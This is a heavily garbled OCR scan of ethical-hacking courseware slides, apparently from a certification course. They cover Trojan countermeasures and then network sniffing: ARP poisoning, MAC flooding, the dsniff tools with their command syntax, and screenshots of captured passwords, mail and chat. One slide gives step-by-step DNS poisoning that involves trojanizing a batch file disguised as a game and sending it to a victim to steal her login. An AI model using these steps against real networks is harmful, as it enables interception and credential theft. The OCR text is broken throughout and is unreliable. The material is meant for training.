cause damage (for exampi e, before accessi ng a f I oppy, 
running exe, or downloading mail) 

© An inexpensive tool called Cleaner 

(http://www.moosoft.com/cleaner.html) can identify 
and eradicate 1000 types of backdoor programs and 
Trojans 

© Educate users not to install applications downloaded 
from the I nternet and email attachments 
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Tool: Tripwire 



© It Is a System I ntegrity Verifier (SIV) 

© Tripwirewill automatically calculate cryptographic hashes of all 
key system files or any file that is to be monitored for modifications 

© Tri pwi re software works by creati ng a basel i ne "snapshot" of the 
system 

© Itwill periodically scan thosefiles, recalculate the information, and 
see if any of the i nformation has changed and if there is a change, 
an alarm is raised 
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System File Ver i f i cati on 



©Windows 2000 introduced 
Windows File Protection (WFP) 
whi ch protects system f i I es that 
were installed by the Windows 
2000 setup progrann fronn being 
overwritten 

©The hashes in this file could be 
connpared with the SH A- 1 hashes 
of the current systenn f i I es to 
verify thei r i ntegrity agai nst the 
factory originals 

©si gVerif.exe utility can perfornn 
this verification process 



File Signature Verification 



To help maintain the integritiJ of your s^Jstem, critical files 
have been digitallv signed so that any changes to these 
files can be quickly detected. 



Click Advanced to customize verification options. 
Click Start to check for any system files that are not 
digitally signed. 



Scanning files.. 



5% 












Stop 1 


Close 


1 Advanced | 
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M D5sum 



© 1 1 checks for f i I e i ntegrity 



C:\WINNT\system32\cmd.eKe 


^ -|n| 




EiSCEHSMod 6 Tro janSurappers>nd5sun -c list.txt 




EI 


Uhat's On Mi) Conputer.exe: OK 




: 


msconf ig.exe : OK 






mdGsun.exe: OK 






list.txt: FAILED 






ndBsun: WARNING: 1 of 4 computed checksums did NOT match 






E:SCEHSMod 6 Tro janSurappers> 
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© 1 1 hel ps to protect the 
Wi ndows users from 
spywareand unwanted 
software 

© Reduces negative effects 
such as slow PC 
performance, unwanted 
changes to I nternet setti ngs, 
and unauthorized use of 
your private information 
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1 (S MicrDsort AntiSpyware (Beta 1) 




File Options Tools Help 




""^"AntiSpyware Betai 






System Summary: Requires Attention! 


\w M The items marked in red requires your attention. 


Q Last 5can 


You have not run a scan yet! 


Last 5can Results 


You have not run a scan yet! 


Scan Schedule 


Runs at 2:00 AM every day 


Real-time Protection 


3 of 3 Active 


Spyware Definitions 


April 29, 2005 at 5;54;26 PM 


AntiSpyware AutoUpdater 


Active 


Select an item from the list above in order to get more information and 
take the necessary action. 




Real-time Protection 

Real-time protection hielps protect your 
computer from potential problems before they 
can run. 

Advanced Tools 

Advanced tools to manage your system 
configurations and help protect your privacy. 



Message Center 



This version expires in 93 day(s). 

This version of Microsoft AntiSpyware expires on July 31j 
2005. Please contact Microsoft for an updated version. 
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H ow to Avoi d a Troj an I nfecti on? 



© Do not download blindly from people or sites 
which you aren't 100% sure about 

© Even if the file comes from a friend, be sure 
what the fi le is before openi ng it 

© Do not use features in programs that 
automati cal I y get or previ ew f i I es 

© Do not bl i ndly type commands that others td I 
you to type, or go to web addresses mentioned 
by strangers, or run pre-fabricated programs or 
scri pts 
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H ow to Avoi d a Troj an I nfecti on? 



© One should not be lulled into a false sense of 
security just because an antivirus program is 
running in the system 

© E nsure that the corporate peri meter defenses 
are kept conti nuously up-to-date 

© Filter and scan all content at the perimeter 
defenses that could contain malicious content 

© Run local versions of antivirus, firewall, and 
i ntrusion detection software at the desktop 
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H ow to Avoid a Trojan I nfection? 



© Rigorously control user permissions within the desktop 
envi ronment to prevent the i nstal I ati on of mal i ci ous 
applications 

© Manage local workstation file integrity through 
checksums, auditing, and port scanning 

© M on i tor internal network traffic for odd ports or 
encrypted traffic 

© Use multiple virus scanners 

© I nstal I i ng a software for i dentifyi ng and removi ng ad- 
ware/ mal ware/ spyware 
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Summary 



© Troj ans are mal i ci ous pi eces of code that carry cracker 
software to a target system 

© Trojans are used primarily to gain and retain access on 
tlie target system 

© Trojans often reside deep in tlie system and make 
registry changes that al low it to meet its purpose as a 
remote ad mi n i strati on tool 

© Popular Trojans include back orifice, netbus, subseven, 
beast, etc. 

© Awareness and preventive measures are the best 
defense agai nst Troj ans 
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Ethical Hacking 



Module VI I 
Sniffers 



Scenario 



1 

2. 
3. 
4. 
5. 
6. 
7. 



Dave works as an engi neer i n the I T support staff of a 
multinational banking company. Sam, a graduate in 
Computer Engineering, has recently been recruited by the 
bank as a trainee to work under Dave. Sam knows about 
packet sniffers and has seen their malicious use. Sam 
wants to sniff the network to show the vul nerabi I i ti es to 
Dave. 



What information does Sam need to install a sniffing program? 

How can Sam find out if there are any sniffing detectors on the network? 

Can Sam sniff from a remote network? 

Can he install a sniffer on Dave's machine? 

Can he find credit card information by sniffing? 

Is Sam's action ethical? 

Will he be charged, under the law, for sniffing the network? 
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Module Objectives 



0 Definition 

0 Protocol vulnerable to sniffing 

0 Types of sniffing 

0 What is ARP7ARP poisoning 

0 ToolsforARP spoofing 

0 MAC flooding 

0 Tools for MAC flooding 

BC-Council 



0Sniffer hacking tools 

0 Steps to perform DNS 
poisoning 

0Toolsfor sniffing 

0 Cou n termeasu res 

0Sunnnnary 
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Module Flow 



Definition of Sniffing 



■► Protocol Vulnerable to Sniffing 



Active Sniffing 



Passive Sniffing 



Sniffer Hacking Tool 




Sunnnnary 
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Definition : Sniffing 



©A progrann or device that captures 
vital information fronn the networl< 
traffic specific to a particular 
network 

©Sniffing is a data interception 
technology 

©The objective of sniffing is to steal: 

• Passwords (from emai I , the web, 
SMB, ftp, SQL, or telnet) 

• Email text 

• Files in transfer (email files, ftp 
files, or SMB) 




H 








U/ 
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Protocols Vulnerable to Sniffing 



© Protocol s that are suscepti bl e to sniffers i ncl ude: 

• Telnet and RIogin: Keystrokes including user names and passwords 

• H TTP : Data sent i n cl ear text 

• SMTP: Passwords and data sent in clear text 

• NNTP: Passwords and data sent in clear text 

• POP : Passwords and data sent i n cl ear text 

• FTP : Passwords and data sent i n cl ear text 

• I M AP : Passwords and data sent i n cl ear text 
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N etwork Vi ew - Scans the N etwork for 
Devices _ 

I WetworkView - [HetworkViewl] ^^^^^^ 



f-f File Edit View Lists Loqs 



ndow Help 



^ [Q Ea g Si 



lib 

192.168.0.1 



H 
192.168.0.5 



192.168.C.8 



H 
I 

192.168.0.9 



H 
I 

192.168.0.12 



H 
I 

192.168.0.17 



H 
I 

192.168.0.79 



Pi opci tics 



General | NetBIOS | Snmp | Tcp Ports | Wmi | Note | Monitcring | 



(Double click grav to cditl 



Description 


Value 


Type: 


L)scover> Uate 


UVZ/ZUb li:4ti:^y KM 




Last Update 


04/27/0512:45:29 PM 




IF Address 


192.168.0.1 


MAC Add ess 




N C Manufacturei 




mT' Locked 


D^G Name 




N3/SYS Name 




NstBIOS Domain 




























\ 4l M t [ 

l-LI ■ '1 -LI 



Export 



OK 



Cancel 



Appiv 



Help 
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Etherea 



©Ethereal is a network 
protocol analyzer for 
UNIX and Windows 

©It allows the user to 
exami ne data from a 
I i ve network or from a 
capture file on a disk 

© The user can 
i nteracti vely browse the 
captured data, viewing 
summary and detailed 
information for each 
packet captured 
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File Edit Capture Display Tools 



Help 



No. 


Time 


Source 


Destination 


Protocol 


Info 


P 
_l 


1 


0.000000 


10.0.0.2 


10.0.0.5 


NFS 


V2 GETATTR Call HD 0xee9c58d8 




2 


0.000001 


00:40:95:42:2f:8e 


ff:ff:ff:ff:ff:ff 


ARP 


Who has 10.0.0.2? Tell 10.0.0. 




3 


0.000055 


00:00:21:20:a0:05 


00:40:85:42:2f:9e 


ARP 


10.0.0.2 is at 00:00:21:20:a0:0 




4 


0.001 500 


10.0.0.5 


10.0.0.2 


NFS 


U2 GETATTR Reply m 0xee9c58dG 




5 


0.B4GGG7 


10.0.0.2 


10.0.0.5 


NFS 


V2 LOOKUP Call HD 0xef9c58d8 


III 


6 


0.647031 


10.0.0.5 


10.0.0.2 


NFS 


V2 LOOKUP Reply XID 0xef9c58d6 




7 


0.65031 3 


10.0.0.2 


10.0.0.5 


NFS 


V2 LOOKUP Call XID 0xf09c58d8 




8 


0.651 230 


10.0.0.5 


10.0.0.2 


NFS 


V2 LOOKUP Reply HD 0xf09c58d8 




9 


0.651 530 


10.0.0.2 


10.0.0.5 


NFS 


V2 LOOKUP Call HD 0xf19c58d8 




10 


0.652470 


10.0.0.5 


10.0.0.2 


NFS 


V2 LOOKUP Reply HD 0xf19c58d8 




11 


0.65271 8 


10.0.0.2 


10.0.0.5 


NFS 


V2 LOOKUP Call XID 0xf29c58d8 




12 


0.653855 


10.0.0.5 


10.0.0.2 


NFS 


V2 LOOKUP Reply XID 0xf29c58d6 




13 


0.653303 


10.0.0.2 


10.0.0.5 


NFS 


U2 LOOKUP Call HD 0xf39c53dG 




14 


0.654787 


10.0.0.5 


10.0.0.2 


NFS 


U2 LOOKUP Reply HD 0xf39c58d6 




15 


0.655023 


10.0.0.2 


10.0.0.5 


NFS 


V2 LOOKUP Call XID 0xf49c58d8 




16 


0.655841 


10.0.0.5 


10.0.0.2 


NFS 


U2 LOOKUP Reply HD 0xf49c58d8 




17 


0.6581 20 


10.0.0.2 


10.0.0.5 


NFS 


V2 LOOKUP Call HD 0xf59c58d8 





B Frame 1 (138 on wire, 186 captured) 

B Ethernet II 

B Internet Protocol 

B User Datagram Protocol 

B Remote Procedure Call 

m Npfwnrk Flip 'iv^tpm 



-J- 



0000 


00 40 95 42 2f 9e 00 


00 


21 20 aO 05 08 00 45 00 .^.B/... ! ....E. 




0010 


00 ac e2 00 00 00 40 


11 


84 3a Oa 00 00 02 Oa 00 


.: 




0020 


00 05 03 20 08 01 00 


38 


d9 3b ee 8c 58 d6 00 00 ... 


1 




0030 


00 00 00 00 00 02 00 


01 


86 a3 00 00 00 02 00 00 






0040 


00 01 00 00 00 01 00 


00 


00 48 00 07 7a Od 00 00 .... 


H..Z... 




Filter 


/\ Reset 


■=live capture in progress^ 
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Types of Sniffing 



© There are two types of sniffi ng 

• Passive sniffing 

• Active sniffing 
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Passive Sniffing 



I 




© Passive sniffing is sniffing through a hub 

© Attacker simply places the laptop on the hub 
and starts sniffing 

Copyri ght © by BC-Cbunc i I 
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Active Sniffing 



I 



LAN 





Switch 



Switch looks at the MAC addresses 
associated with each frame, sending data 
only to the required connection 




Attacker 




Tech n i ques for acti ve sn i ff i ng: 
MAC flooding 
<♦ ARP spoofing 
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Attacker tries to poison the switch 
by sending bogus MAC addresses 



©Sniffi ng through a switch 
©Difficult to sniff 
©Can easily be traced 
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WhatisARP? 



© Address Resolution Protocol is a 
network layer protocol used to 
convert an I P address to a physical 
address (called a MAC address), such 
as an Ethernet address 

© To obtai n a physical address the host 
broadcasts an ARP request to the 
TCP/ 1 P network 

© The host with the I P address i n the 
request replies with its physical 
hardware address on the network 
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IP address ^ 
MAC addfess 

i 



IP datagram 
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ARP Poisoning 



©ARP resolves I P addresses to the MAC 
(hardware) address of the i nterface to send 
data 

©ARP packets can be forged to send data to 
the attackers' machi nes 

©An attacker can exploit ARP poisoning to 
intercept network traffic between two 
machi nes i n the network 

©By MAC flooding a switch's ARP table with 
spoofed ARP replies, the attacker can 
overload the switches and then packet sniff 
the network while the switch is in hub mode 
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ARP Poisoning (Poisoning the Router) 




2 



Victim: 
J olin 
IP: 192.168.121 



J ohn's internet traffic is forwarded to 
the attacker's systenn as its I P address 
is associated with that of the router 





Attacl<er 



The attacl<er sniffs the- 
trafficfronnj ohn and 
forwards the traff i c to 
the router. The router 
then forwards thenn on 
to the i nternet 



The attacl<er broadcasts 
that his I Pis 192.168.1254 
(the router's I P) and his 
MAC address is 
ATTACKERS_MAC 

Router 
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192.198.1254 
Mac: ROUTE RS_ MAC 
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Tools for ARPSpc 



© ToolsforARP spoof 

• Arpspoof 

• Ettercap 
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ing 
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Ettercap 



EiJeltercap prompt - ettercap 



CiSProgran Files\ettercap>ettercap 
ettercap 0.6.7 <c> 2002 flLoR & NaGfl 
iList of auailable devices : 



— > [deul] 

— > [deu2] 

— > [deu3] 

— > [deu4] 

— > [deu5] 

— > [deu6] 



— > [deu7] 



Please select 
Vour IP: 0.0. 

Till -I 1 <l -I 'Un-c^-t 



Jettercap prompt - ettercap 



ettercap 0.6.7 



1 hosts in this LA N <97.i0.i5.72 : 82. 32. 250. 0> 
EW^^^SrXVMimfJgi ±j 97.10.15.72 



Jettercap prompt - ettercap 
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A tool for I P- based sniffing in a switched networl<, MAC based sniffing, OS 
fingerprinting, ARP poisoning based sniffing, and so on 
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MAC Flooding 



© MAC flooding involves flooding the switch with 
numerous requests 

© Switches have a limited memory for mapping various 
MAC addresses to the physical ports on the switch 

© MAC flooding makes use of this limitation to bombard 
the switch with fake MAC addresses until the switch 
can't keep up 

© The switch then acts as a hub by broadcasting packets 
to al I the machi nes on the network 

© After this, sniffi ng can be easi ly performed 
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Tool s f or M AC F I ood 



© Tools for MAC Flooding 

• Macof 

• Etherflood 




s 
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© Macof floods the local network with random MAC 
addresses, causing some switches to fail to open in 
repeating mode, which facilitates sniffing. 



macof [-i interface] [-s src] [-d dst] 
[-e tha] [-X sport] [-y dport] [-n 
times ] 
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© EtherFlood floods a switched network with Ethernet 
frames with random hardware addresses 

© The effect on some switches is that they start sendi ng a! I 
traffic out on all ports so that the attacker is able to sniff 
all traffic on the sub network 

© http:// ntsecurity.nu/toolbox/etherflood/ 
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■ 



©Sniffer hacking tools 

arpspoof 

■ I ntercepts packets on a switched LAN 

dnsspoof 

■ Forges replies to DNS address and pointer queries 

dsniff 

■ Password sniffer 

filesnarf 

■ Sniffs files from NFS traffic 

mailsnarf 

■ Sniffs nnai I nnessages i n Berkel ey nnbox format 

msgsnarf 

■ Sniffs chat messages 
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Sniffer Hacking Tools (continued) 



sshmitm 

■ SSH mon key- in-the- middle 

tcpkill 

■ Kills TCP connections on a LAN 

tcpnice 

■ Slows down TCP connections on a LAN 

urisnarf 

■ Sniffs HTTP requests in Common Log Format 

webspy 

■ Displays sniffed URLs in Netscape in real time 

webmitm 

■ HTTP/HTTPSmonkey-in-the-middle 
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© Arpspoof redi rects packets from a target host i ntended 
for another host on the LAN by forging ARP replies 

© Arpspoof is the effective way of sniffi ng traffic on a 
switch 

©arpspoof [-i interface] [-t target] 
host 
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Dnsspoof 



© Dnsspoof forges repi i es to arbitrary DNS address/ poi nter 
queries on the LAN. DNS spoofing is useful in bypassing 
hostname- based access controls, or in implementing a 
variety of man- in-the- middle attacks 

© dnsspoof [-i interface] [-f hostsf ile] 
[expression] 
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Dsn iff 



© Dsniff is a password sniffer wliich handles FTP, Telnet, SMTP, HTTP, 
POP, poppass, NNTP, IMAP, SNMP, LDAP, RIogin, RIP, OSPF, PPTP 
MS-CHAP, NFS, VRRP, and so on 

© Dsniff automatically detects and minimally parses each application 
protocol, only saving the interesting bits, and uses Berkeley DB as its 
output file format, only logging unique authentication attempts. Full 
TCP/ 1 P reassembly is provided by libnids 

© dsniff [-c] [-d] [-m] [-n] [-i interface] [-s snaplen] 
[-f services] [-t trigger [,...]] ] [-r|-w savefile] 
[expres- sion] 



E] C:\WIMMT\System32\cmd.eKe - dsniff 



C : SDocunents and Sett ingsNfldnin istratorSDesktopNEtliical Heiclfing and Counterne; r 
res u3.1SModule 7 - Sn if f ersSdsn if f -win32\dsn if f -1 . 8-win32-stat ic >dsn if f 



07^08^04 18:49:41 uindous 
USER Jason 
PASS rub in 



-> 202.129.165.122 <pop> 
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J 



Filesnarf 



© F i I esnarf saves f i I es sn i ff ed from NFS traff i c i n the 
current worki ng di rectory 



filesnarf [-i interface] [ [-v] pattern [expression] ] 
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Mailsnarf 



© Mailsnarf outputs email messages sniffed from SMTP 
and POP traffic in Berkeley mbox format, suitablefor 
off I i ne browsi ng with your favorite mai I reader 

mailsnarf [-i interface] [ [-v] pattern 
[expression] ] 



Ellselect C:\WINNT\System32\cmd.eKe - mailsnarf 


_|n| 




charset="iso-88S9-l" 
Gontent-Transf er-Encoding: quo ted-pr in table 




Janes , 




J 


I have not received my CEH certificate. I passed the exam on the 12, May = 
2004 and there is no mail. |^ 

Please look into this matter and send ny CEH uelcone kit as soon as = 
poss ible . 










Thanks . 






Peter Smith 







=_NextPart_000_000S_0iC46520.0339B950 

Content-Type: text/html; 

charset="iso-8859-i" 
Content-Transfer-Encoding: quo ted-pr in table 

<»DOCTVPE HTML PUBLIC "-//U3C//DTD HTML 4.0 Trans it ional//EN"> 
<HTML><HEflD> 

<METfl content=3D"text/htnl; charset =3Diso-8859-l " = 
http-equiu=3DContent-Iype> 

i<METfl content=3D"MSHIML S. 00. 2920.0" name =3DGENERftT0R> 
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Msgsnarf 



© M sgsnarf records selected messages from AOL I nstant 
Messenger, ICQ 2000, 1 RC, MSN Messenger, or Yahoo 
M essenger chat sessi ons 



msgsnarf [-i interface] [ [-v] pattern 
[expression] ] 
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© Sshmitm proxies and sniffs SSH traffic redirected by 
dnsspoof capturing SSH password logins, and optionally 
hijacking interactive sessions 

© Only SSH protocol version lis(or ever will be) supported. 
This program is far too dangerous already 

sshmitm [-d] [-1] [-p port] host [port] 
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Tcpki I 



© Tcpkill kills specifies in- progress TCP connections 
(useful for libnids-based applications which requireafull 
TCP 3-way hand shake for TCB creation) 



tcpkill [-1 interface] [-1...9] expression 
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Tcpnice 



© Tcpnice slows down specified TCP connections on a LAN ^ 
vi a acti ve traffi c shapi ng ^ 

tcpnice [-1] [-i interface] [-n increment] 
expression 
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Urisnarf 



L 



© 



Urisnarf outputs all requested URLs sniffed from HTTP 
traffic! n CLF (Common Log Format, used by almost all web , 
servers), suitable for offi i ne post-processi ng with your \ 
favorite web log analysis tool (analog, wwwstat, and so on) 

urisnarf [-n] [-i interface] [ [-v] pattern 
[expression] ] 
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^C:\WINNT\System32\cmd.e 



/pop_under.asp?loc=landingpageRenail=8«prono =7Bft99B16-34DE-43CF-8F0D-D9B4ft75063DB 
" "Mozilla/4.0 <conipatible; MSIE 5.01; Windows NT 5.0>" 

192.168.131.67 [/Jul/2004:18 :32 :13 -0700] "GET http://iniages.agoranedia.coni/ 

sbd/pop/icon_tour_orange .gif HTTP/1.1" - - "littp://secupe .ago ramedia. con/so uthhe 
ach/pop_under . asp? loc =landlngpage8(enall=&prono =7Bfi99B16-34DE-438F-8F0D-D9B4fl7506 
3DB" "Mo2illa/4.0 <conpatible; MSIE 5.01; Windows NT 5.0>" 

192.168.131.67 [/Jul/2004:18 :32 :13 -0700] "GET http://images.agoranedia.com/ 

sbd/bu lie tin /clear. gif HTTP/1.1" - - "http://secure.agoranedia.con/southbeach/po 
p_under.asp?loc=landingpageRenail=8(prono=7Bft99B16-34DE-438F-8F0D-D9B4ft75063DB" " 
Mosilla/4.0 <conpatible; MSIE 5.01; Windows NT 5.0>" 

192.168.131.67 [/Jul/2004:18 :32 :14 -0700] "GET http://inages.agoranedia.con/ 

sbd/pop/hd_f ood_loiiers .gif HTTP/1.1" - - "http://secure.agoranedia.con/southbeac 
h/pop_under.asp? loc=landingpage8(enail=&prono=7Bfl99B16-34DE-438F-8F0D-D9B4fl75063D 
B" "MoHilla/4.0 (conpatible; MSIE 5.01; Windows NT 5.0>" 

192.168.131.67 [/Jul/2004:18 :32 :14 -0700] "GET http://inages.agoranedia.con/ 

sbd/tnl.gif HTTP/1.1" - - "http://secure.agoranedia.con/southbeach/pop_under.asp 
?loc=landingpage&enail=&prono=7Bft99B16-34DE-438F-8F0D-D9B4ft75063DB" "Mozilla/4.0 
(compatible; MSIE 5.01; Windows NT 5.0>" 

192.168.131.67 [/Jul/2004:18 :32 :14 -0700] "GET http://inages.agoranedia.con/ 

sbd/pop/bn_subnowline .gif HTTP/1.1" - - "http://secure.agoramedia.con/southbeach 
/pop_under.asp?loc = landingpage8(enail=8ipromo =7Bfl99B16-34DE-438F-8F0D-D9B4fl75063DB 
" "Mo2illa/4.0 (compatible; MSIE 5.01; Windows NT 5.0>" 

C:\Documents and Sett ingsSAdnin istratorSDesktopSEthical Hacking and Countermeasu 
res u3.1SModule 7 - Sniff ersSdsnif f-win32Sdsnif f-1 .8-win32-static> 



3 



J 
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Webspy 



© Webspy sends U RLs sniffed from a cl ient to your local 
Netscape browser for display, updated in real time (as 
the target surfs, your browser surfs along with them, 
automatically). Netscape must be running on your local 
X display ahead of time 

webspy [-i interface] host 
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Webmitm 



© Webmitm transparently proxies and sniffs 

HTTP/HTT PS traffic redirected bydnsspoof, capturing 
most secure SSL-encrypted webmail logins and form 
submissions 

webmitm [-d] 
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DNSpoisoning 



To redirect all the DNS request traffic going from host 
machi ne to come to you 



z. 

I 



Set up a fake website on your computer. 

Install treewalkand modify the file mentioned in the readmatxttoyour ip 
address. Treewal k wi 1 1 make you the dns server. 



3. Modifythefiledns-spoofing.bat and replace the IP address to your ip address. 

"4. Trojanizethedns-spoofing.bat fileand send ittoj essica (ex: chess.exe). 

5. When the host clicks the trojaned file, it will replace] essica's dns entry in her 
1^ tcp/ i p properties with that of your machi ne. 

6. You will become the dns server for J essica and her dns requests will go through 
IP you. 

^. When J essica connects to XSECURITY.com she resolves to fakeXSECURITY 
website; you sniff the password and send her to the real website 
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nteractiveTCP Relay 



© 1 1 operates as a 
simple TCP tunnel 
listening on a specific 
port and forwarding 
al I traffic to the remote 
host and port 

© The program can 
intercept and edit the 
traff i c passi ng through 
it 

© The traffic can be 
edited with the built- 
in HEX editor 



^Interactive TCP Relay - [ITRl] 



111 File Edit View Opticns Window Help 



D 



Change Encoding Error : Can't open encoding file 



Outgoing 
Send 



Inject 



Waiting Messages 
Waiting Characters 



r Intercept 
|~ Don't show messages 



i + 



Incoming 

Send I Inject 
For Help, press Fl 



7] 



oaoaea 



oaoaea 
iJ 



Jnjxj 



Server: 


1.1.1.1 






Client: 








Encoding: 


ANSI 


Set 


This PC: 








This PC 








Save log: 




r 



2l 

A 
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I nteractive Replay Attacks 




ATTACKER 
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HTTP Sniffer: EffeTech 



© An HTTP protocol packet sniffer and network 
analyzer 

© Captures I P packets containing HTTP 
protocol 

© Enables on-the-fly content viewing while 
monitoring and analyzing 

© Parses and decodes HTTP protocol, and 
generates a web traffic report for reference 
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HTTP Sniffer: EffeTech 



^iSP HtlipDeliecl: tEffeTech HTTP Sni^^er) 




File View Sniffer Help 
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HTTP Request Header 



GET / images/ logo_itini . gif HTTP/ 1 . 1 
Accept : */ * 

Ref e r e r : ht t p : / / www . effetech. c om/ 

fl.c c ep t — L ajigu.ag'e : zli— cn 

Ac c ep t — Enc o d.in.g' : g'zip, deflate 

Us e r — Ag'ent. : Ho z i 1 1 a/ 4.0 ( c omp at iti 1 f. 

HSIE 6.0; Windows NT 5.1) 

Host: ■www.eth.erd.etect.com 

C OTiJie c t ± on : Keep — Alive 

Re ady 



HTTP Response Header 



HTTP/1.1 2 00 OK 

Date: Sat, 07 Jun 2003 13:32:07 GHT 
Server: Apache/ 1 . 3 . 2 7 

Last-Modified: Hon, 14 Apr 2003 14:11:33 
GHT 

ETa^: "]odae-4c 1-3 e9ac 195 " 
Accep t — Ran.g'es : toytes 
Content-Length : 12 17 
Ke ep — All V e: timeout = 5, max=100 



Buffer: 3% 



URLs 



95 



Packets: 393 
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Password Sniffer 



© Can monitor and capture passwords through FTP, 
P0P3, HTTP, SMTP, Telnet, and some web mail 
passwords 

© Can listen on LAN and capture passwords of any 
network user 

© Ace Password Sniffer works passively and is very 
hard to detect 

© I f a network is connected through a switch, the 
sniffer can be run on the gateway or proxy server, 
which can get all network traffic 
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Password Sniffer 
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© Captures MSN chat on network 

© 1 1 records M SN conversati ons automati cal ly 

©AIM ntercepted messages can be saved as H TM L f i I es f or 
later processing and analyzing 

© Everythi ng wi 1 1 be recorded without bei ng detected 




Capturi ng M essages 





Sniffer 
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MSN Sniffer 



mm 




& (i) ^ 



5tart 5toEL Save ConFig Register About 
MSN messenger conversation list; 



Exit 



IP 



I port I Liser(ennail) 



0 BILLGATES (192. 168. 1.8) 



1 HARRY (192, 168,1. 3^ 



2 HARRY (192,168,1.3) 

3 BILLGATES (192.168.1.8) 

4 HARRY (192,168,1.3) 

5 BILLGATES (192.168.1.8) 

6 HARRY (192,168,1.3) 

7 BILLGATES (192.168.1.8) 



1136 testXP (Xxxxlinvisa@hotnnaiLconn) 



2943 XxxxniFfer@hotmaiLconn 



2950 
1191 
2951 
1197 
2952 
1198 



msnKiller ( XxxxniFFer@hotnnail . com) 
)(xxxlinvisa@hotmail . com 
Xxxx niff er@hotmail . com 
)(xxxlinvisa@hotmail . com 
Xxxx niff er@hotmail . com 
XxxxlinvisafSihotmail . com 



I Messages 
7 

1 

2 
2 
2 
2 
2 



I 



Messages in the conversation: □ Auto Refresh Refresh 



#5, 2004-5-9 00:44:22 
iKixxsn iflfer@hotrnail.com says: 

Right here :) 

#4, 2004-5-9 00: 44: OS 

c^xiXP ( xxxxlinvisai3ihotm.ail.corn) says: 

Where do u wanna go right now? 

#3, 2004-5-9 00:43:44 
xxxsniflfer@hotmail.com says: 

well done! 

#2, 2004-5-9 00:43:20 
xxxsniflferOihotmail.com says: 

<OK> a fully show 

#1,2004-5-9 00:43:11 



puffer Usage; 150 KB [Conversations; 9 



Capturing. 
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Session Capture Sniffer: NWreader 



© NetWitness audits and monitors all traffic on a 
network 

© I nterprets the activities i nto a format that 
network engi neers and non-engi neers al i ke can 
quickly understand 

© Records all activities, and transforms the "take" 
i nto a dense transacti onal model descri bi ng the 
network, application, and content levels of those 
activities 
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Session Capture Sniffer: NWreader 



' demo - NetWitness Reader 



File Summary Navigation Content Tools Help 



<Drill Down Depth> 



"Zf + + SI** 



El-'tS 

[jj- 
[jj- 
[jj- 

a- 
s-l 
a-i 
a- 
a-i 
s-i 
a-' 
a- 
a- 
a- 



Collection 



^ Action 
^ Address 
! Alert 
*B Alias 
S] Content 
^ Port 
■ Properties 
" Protocol 
|W) Resource 
^ Service 
1 Size 
Time 
^ User 



Ready 





Time 


Service 


Size 


Events 



— Less + More ||^ First |^ Page 4" Prey NeKt ^ Page ^| Last 



No sessions selected 





P 






« V. 1 


□pen Close 


Qu^ry 


Edit 


Help About 



Add /4 











J 


Sidel 


Side 2 


Auto 




Details m TeKt [,"[ Strings bee HeK Owfe Packets ■ 


Mail IS 



NetWitness audits and monitors all traffic 
on a network 



I |num 
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Cain and Abel 



I 



© M SCACH E H ashes Dumper 

© M SCACH E Hashes Dictionary and Brute- Force 
Cracl<ers 

© Sniffer filter for SI P-|V| D5 authentications 

© SI P-MD5 Hashes Dictionary and Brute- Force Crackers 

© Off- 1 i ne capture f i I e processi ng compati bl e with 
winpcap, tcpdump, ethereal format 

© Cain's sniffer can extract audio conversations based on 
SI P/ RTP protocols and save them i nto WAV fi les 
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Cain and Abel 




^Jnj2<J 



File View Configure Tools Help 



] 1^ ® 



64 



Protected Storage 



LSA Secrets 



Network 



SnlFFer | Cracker | Traceroute 



Resource 


Usernanne 


Password 


Type 




mail , eccouncil . org 


maggie@eccou. . . 


hanushyam 


Outlook Express POPS Account 




Jb4^ III II 1 -1 

^ 1 http;//webnnail.nyi,ne. , , 


g.lathkar@ecco, , . 




Internet Explorer Form Autocomplete 





















































































































































































































Cain v2.5 beta28 by mao 
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Packet Crafter 

Craft Custom TCP/ 1 P Packets 




^Komodia's packet crafter 




_jnj 






Source port: 






Source IP: | 1 . 1 . 1 . 1 


0 



Destination IP: 

Header size: 
(bytes) 

Identification: 

Checksum: 

Type of service: 

Fragmentation 
flags: 

Offset: 



20 



Destination port: 



Default size 
Random 

Default checksum 



1 Routine 




1 May frag 


d 



Send IP packet 



Visit us: 



www.komodia.com 



Send ICMP packet 



TTL: 


255 


Data size 


0 


Data: 













Send UDP packet 



Use 1 or more 
when sending I Ft 



Send TCP packet 



TCP parameters 



Flags: F URG F ACK F PSH F RST F SYN F FIN 
Sequence: 
Acknowledge: 
Window: 
Urgent 
Offset: 

TCP checksum: 



jo 

jisoo 



Send 



Back 



Default checksum 
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SMAC 



V SMAC 1.1 [WBEM On] 



hile ADOUC 



ID 1 


Active 1 Spoofed | Network Adapter | IP Address | Active MAC 


0000 


Yes No NDIS 5.0 driver ... 192.1G8.20.il 4 00-C1-2G-0F-B2-72 

















































































P' Show Onlv Active Network Adapters 
New Spoofed MAC Address 



I 00 -| BZ -| ^3 -| OD -| AZ 

Spoofed MAC Address 



- ZA 2<J 



Update MAC 



Remove MAC 



Refresh 



Exit 



Active MAC Address 



00-C1-26-0F-B2-72 



KLC CONSULTING, INC 

WWW. k1 cconsuiti ng. net/smac 



I Disclaimer: Use this program at your own risk. We are not responsible for any damage that might occur to your system. This 
program is not to be used for any illegal or unethical purpose. Do not use this program it you do not agree with this disclaimer. 

SM AC i s a M AC Add r ess M od i fyi ng U ti I i ty ( spoof er) 
for Windows 2000, XP, and Server 2003 systenns. 1 1 displays networl< 
infornnation of available network adapters on one screen. The built-in 
logging capability allows it to track MAC address nnodifi cation activities 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Raw Sniffing Tool 



© Sniffit 
© Aldebaran 
© Hunt 
© NGSSniff 
© Ntop 
© pf 
© IPTraf 
© Etherape 
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■ 



© Snort 

© Windump/tcpdump 
© Etherpeek 
© Mac Changer 
© Iris 

© Netlntercept 
© WinDNSSpoof 
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Features of Raw Sniffing Tools 



I 



© Data can be i ntercepted "off the wi re" from a I i ve 
network connection, or read from a captured file 

© Can read captured fi les from tcpdump 

© Command lineswitcliesto tlieeditcap program enables 
the editi ng or conversion of the captured f i les 

© Display fi Iter enables the refi nement of the data 



BC-Councll 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Sniffit 



© Sniffit is a pacl<et sniffer for TCP/ U DP/ 1 CIV| P pacl<ets 

© It provides detailed technical information about the 
packets and packet contents in different formats 

© By default it can handle Ethernet and PPP devices, but 
can be easi I y forced i nto usi ng other devices 
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Aldebaran 



© Aldebaran is an advanced LI NUX sniffer/ network 
analyzer 

© 1 1 supports sendi ng data to another host, dump fi le 
